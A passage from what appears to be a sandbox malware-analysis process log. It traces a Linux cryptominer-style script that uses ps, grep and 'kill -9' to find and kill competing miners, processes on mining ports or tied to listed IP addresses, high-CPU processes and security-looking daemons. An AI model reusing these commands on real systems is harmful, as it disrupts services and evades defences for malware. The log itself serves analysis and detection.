  2⤵
  PID:1746
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1756
- /bin/grep
  grep -v -
  2⤵
  PID:1755
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1754
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1753
- /bin/grep
  grep :3333
  2⤵
  PID:1752
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1762
- /bin/grep
  grep -v -
  2⤵
  PID:1761
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1760
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1759
- /bin/grep
  grep :3389
  2⤵
  PID:1758
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1768
- /bin/grep
  grep -v -
  2⤵
  PID:1767
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1766
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1765
- /bin/grep
  grep :4444
  2⤵
  PID:1764
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1774
- /bin/grep
  grep -v -
  2⤵
  PID:1773
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1772
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1771
- /bin/grep
  grep :5555
  2⤵
  PID:1770
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1780
- /bin/grep
  grep -v -
  2⤵
  PID:1779
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1778
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1777
- /bin/grep
  grep :6666
  2⤵
  PID:1776
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1786
- /bin/grep
  grep -v -
  2⤵
  PID:1785
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1784
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1783
- /bin/grep
  grep :6665
  2⤵
  PID:1782
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1792
- /bin/grep
  grep -v -
  2⤵
  PID:1791
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1790
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1789
- /bin/grep
  grep :6667
  2⤵
  PID:1788
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1798
- /bin/grep
  grep -v -
  2⤵
  PID:1797
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1796
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1795
- /bin/grep
  grep :7777
  2⤵
  PID:1794
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1804
- /bin/grep
  grep -v -
  2⤵
  PID:1803
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1802
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1801
- /bin/grep
  grep :8444
  2⤵
  PID:1800
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1810
- /bin/grep
  grep -v -
  2⤵
  PID:1809
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1808
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1807
- /bin/grep
  grep :3347
  2⤵
  PID:1806
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1816
- /bin/grep
  grep -v -
  2⤵
  PID:1815
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1814
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1813
- /bin/grep
  grep :14444
  2⤵
  PID:1812
- /bin/grep
  grep -v -
  2⤵
  PID:1821
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1822
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1820
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1819
- /bin/grep
  grep :14433
  2⤵
  PID:1818
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1828
- /bin/grep
  grep -v -
  2⤵
  PID:1827
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1826
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1825
- /bin/grep
  grep :13531
  2⤵
  PID:1824
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1830
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:1829
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1832
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:1831
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1834
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:1833
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1836
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:1835
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1838
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:1837
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1840
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:1839
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  - Reads CPU attributes
  PID:1841
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  PID:1842
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  PID:1843
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1848
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1847
- /bin/grep
  grep -v grep
  2⤵
  PID:1846
- /bin/grep
  grep ./oka
  2⤵
  PID:1845
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1844
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1853
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1852
- /bin/grep
  grep -v grep
  2⤵
  PID:1851
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:1850
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1849
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1865
- /bin/grep
  grep -v kinsing
  2⤵
  PID:1863
- /bin/grep
  grep -v postgres
  2⤵
  PID:1861
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1862
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1860
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1864
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1859
- /bin/grep
  grep -v "("
  2⤵
  PID:1858
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1857
- /bin/grep
  grep -v bin
  2⤵
  PID:1856
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:1855
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads runtime system information
  PID:1854
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1876
- - /usr/local/sbin/kill
    kill -9 1274
    3⤵
    PID:1877
- - /usr/local/bin/kill
    kill -9 1274
    3⤵
    PID:1877
- - /usr/sbin/kill
    kill -9 1274
    3⤵
    PID:1877
- - /usr/bin/kill
    kill -9 1274
    3⤵
    PID:1877
- - /sbin/kill
    kill -9 1274
    3⤵
    PID:1877
- - /bin/kill
    kill -9 1274
    3⤵
    PID:1877
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1875
- /bin/grep
  grep -v postgres
  2⤵
  PID:1873
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1874
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1872
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1871
- /bin/grep
  grep -v "("
  2⤵
  PID:1870
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1869
- /bin/grep
  grep -v bin
  2⤵
  PID:1868
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:1867
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  PID:1866
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1888
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1887
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1886
- /bin/grep
  grep -v postgres
  2⤵
  PID:1885
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1884
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1883
- /bin/grep
  grep -v "("
  2⤵
  PID:1882
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1881
- /bin/grep
  grep -v bin
  2⤵
  PID:1880
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:1879
- /bin/ps
  ps ax
  2⤵
  PID:1878
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1893
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1892
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:1891
- /bin/grep
  grep -v grep
  2⤵
  PID:1890
- /bin/ps
  ps aux
  2⤵
  PID:1889
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1898
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1897
- /bin/grep
  grep -v grep
  2⤵
  PID:1896
- /bin/grep
  grep "sleep 60"
  2⤵
  PID:1895
- /bin/ps
  ps aux
  2⤵
  PID:1894
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1903
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1902
- /bin/grep
  grep -v grep
  2⤵
  PID:1901
- /bin/grep
  grep ./crun
  2⤵
  PID:1900
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1899
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1908
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:1907
- /bin/grep
  grep -v grep
  2⤵
  PID:1906
- /bin/grep
  grep -vw kdevtmpfsi
  2⤵
  PID:1905
- /bin/ps
  ps aux
  2⤵
  PID:1904
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1913
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1912
- /bin/grep
  grep :3333
  2⤵
  PID:1911
- /bin/grep
  grep -v grep
  2⤵
  PID:1910
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1909
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1918
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1917
- /bin/grep
  grep :5555
  2⤵
  PID:1916
- /bin/grep
  grep -v grep
  2⤵
  PID:1915
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1914
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1923
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1922
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1921
- /bin/grep
  grep -v grep
  2⤵
  PID:1920
- /bin/ps
  ps aux
  2⤵
  PID:1919
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1928
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1927
- /bin/grep
  grep log_
  2⤵
  PID:1926
- /bin/grep
  grep -v grep
  2⤵
  PID:1925
- /bin/ps
  ps aux
  2⤵
  PID:1924
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1933
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1932
- /bin/grep
  grep systemten
  2⤵
  PID:1931
- /bin/grep
  grep -v grep
  2⤵
  PID:1930
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1929
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1938
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:1939
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:1939
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:1939
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:1939
- - /sbin/kill
    kill -9 14
    3⤵
    PID:1939
- - /bin/kill
    kill -9 14
    3⤵
    PID:1939
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1937
- /bin/grep
  grep netns
  2⤵
  PID:1936
- /bin/grep
  grep -v grep
  2⤵
  PID:1935
- /bin/ps
  ps aux
  2⤵
  PID:1934
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1944
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1943
- /bin/grep
  grep voltuned
  2⤵
  PID:1942
- /bin/grep
  grep -v grep
  2⤵
  PID:1941
- /bin/ps
  ps aux
  2⤵
  PID:1940
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1949
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1948
- /bin/grep
  grep darwin
  2⤵
  PID:1947
- /bin/grep
  grep -v grep
  2⤵
  PID:1946
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1945
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1954
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1953
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1952
- /bin/grep
  grep -v grep
  2⤵
  PID:1951
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1950
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1959
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1958
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1957
- /bin/grep
  grep -v grep
  2⤵
  PID:1956
- /bin/ps
  ps aux
  2⤵
  PID:1955
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1964
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1963
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1962
- /bin/grep
  grep -v grep
  2⤵
  PID:1961
- /bin/ps
  ps aux
  2⤵
  PID:1960
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1969
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1968
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1967
- /bin/grep
  grep -v grep
  2⤵
  PID:1966
- /bin/ps
  ps aux
  2⤵
  PID:1965
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1974
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1973
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1972
- /bin/grep
  grep -v grep
  2⤵
  PID:1971
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1970
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1979
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1978
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1977
- /bin/grep
  grep -v grep
  2⤵
  PID:1976
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1975
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1984
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1983
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1982
- /bin/grep
  grep -v grep
  2⤵
  PID:1981
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1980
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1989
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1988
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1987
- /bin/grep
  grep -v grep
  2⤵
  PID:1986
- /bin/ps
  ps aux
  2⤵
  PID:1985
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1994
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1993
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1992
- /bin/grep
  grep -v grep
  2⤵
  PID:1991
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1990
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1999
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1998
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1997
- /bin/grep
  grep -v grep
  2⤵
  PID:1996
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1995
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2004
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2003
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:2002
- /bin/grep
  grep -v grep
  2⤵
  PID:2001
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2000
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2009
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2008
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:2007
- /bin/grep
  grep -v grep
  2⤵
  PID:2006
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2005
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2014
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2013
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:2012
- /bin/grep
  grep -v grep
  2⤵
  PID:2011
- /bin/ps
  ps aux
  2⤵
  PID:2010
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2019
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2018
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:2017
- /bin/grep
  grep -v grep
  2⤵
  PID:2016
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2015
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2024
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2023
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:2022
- /bin/grep
  grep -v grep
  2⤵
  PID:2021
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2020
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2029
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2028
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:2027
- /bin/grep
  grep -v grep
  2⤵
  PID:2026
- /bin/ps
  ps aux
  2⤵
  PID:2025
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2034
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2033
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:2032
- /bin/grep
  grep -v grep
  2⤵
  PID:2031
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2030
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2039
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2038
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:2037
- /bin/grep
  grep -v grep
  2⤵
  PID:2036
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2035
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2044
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2043
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2042
- /bin/grep
  grep -v grep
  2⤵
  PID:2041
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2040
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2049
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2048
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:2047
- /bin/grep
  grep -v grep
  2⤵
  PID:2046
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2045
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2054
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2053
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:2052
- /bin/grep
  grep -v grep
  2⤵
  PID:2051
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2050
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2059
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2058
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:2057
- /bin/grep
  grep -v grep
  2⤵
  PID:2056
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2055
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2064
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2063
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:2062
- /bin/grep
  grep -v grep
  2⤵
  PID:2061
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2060
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2069
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2068
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:2067
- /bin/grep
  grep -v grep
  2⤵
  PID:2066
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2065
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2074
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2073
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:2072
- /bin/grep
  grep -v grep
  2⤵
  PID:2071
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2070
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2079
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2078
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:2077
- /bin/grep
  grep -v grep
  2⤵
  PID:2076
- /bin/ps
  ps aux
  2⤵
  PID:2075
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2084
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2083
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:2082
- /bin/grep
  grep -v grep
  2⤵
  PID:2081
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2080
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2089
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2088
- /bin/grep
  grep HiPxCJRS
  2⤵
  - System Network Configuration Discovery
  PID:2087
- /bin/grep
  grep -v grep
  2⤵
  PID:2086
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2085
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2094
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2093
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:2092
- /bin/grep
  grep -v grep
  2⤵
  PID:2091
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2090
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2099
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2098
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:2097
- /bin/grep
  grep -v grep
  2⤵
  PID:2096
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2095
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2104
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2103
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:2102
- /bin/grep
  grep -v grep
  2⤵
  PID:2101
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2100
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2109
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2108
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:2107
- /bin/grep
  grep -v grep
  2⤵
  PID:2106
- /bin/ps
  ps aux
  2⤵
  PID:2105
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2114
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2113
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:2112
- /bin/grep
  grep -v grep
  2⤵
  PID:2111
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2110
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2119
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2118
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:2117
- /bin/grep
  grep -v grep
  2⤵
  PID:2116
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2115
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2123
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:2122
- /bin/grep
  grep -v grep
  2⤵
  PID:2121
- /bin/ps
  ps aux
  2⤵
  PID:2120
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2128
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2127
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:2126
- /bin/grep
  grep -v grep
  2⤵
  PID:2125
- /bin/ps
  ps aux
  2⤵
  PID:2124
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2133
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2132
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:2131
- /bin/grep
  grep -v grep
  2⤵
  PID:2130
- /bin/ps
  ps aux
  2⤵
  PID:2129
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2138
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2137
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:2136
- /bin/grep
  grep -v grep
  2⤵
  PID:2135
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2134
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2143
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2142
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:2141
- /bin/grep
  grep -v grep
  2⤵
  PID:2140
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2139
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2148
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2147
- /bin/grep
  grep nqscheduler
  2⤵
  PID:2146
- /bin/grep
  grep -v grep
  2⤵
  PID:2145
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2144
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2153
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2152
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:2151
- /bin/grep
  grep -v grep
  2⤵
  PID:2150
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2149
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2159
- - /usr/local/sbin/kill
    kill -9 1521
    3⤵
    PID:2160
- - /usr/local/bin/kill
    kill -9 1521
    3⤵
    PID:2160
- - /usr/sbin/kill
    kill -9 1521
    3⤵
    PID:2160
- - /usr/bin/kill
    kill -9 1521
    3⤵
    PID:2160
- - /sbin/kill
    kill -9 1521
    3⤵
    PID:2160
- - /bin/kill
    kill -9 1521
    3⤵
    - Reads CPU attributes
    PID:2160
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:2158
- /bin/grep
  grep "]"
  2⤵
  PID:2157
- /bin/grep
  grep -v aux
  2⤵
  PID:2156
- /bin/grep
  grep -v grep
  2⤵
  PID:2155
- /bin/ps
  ps aux
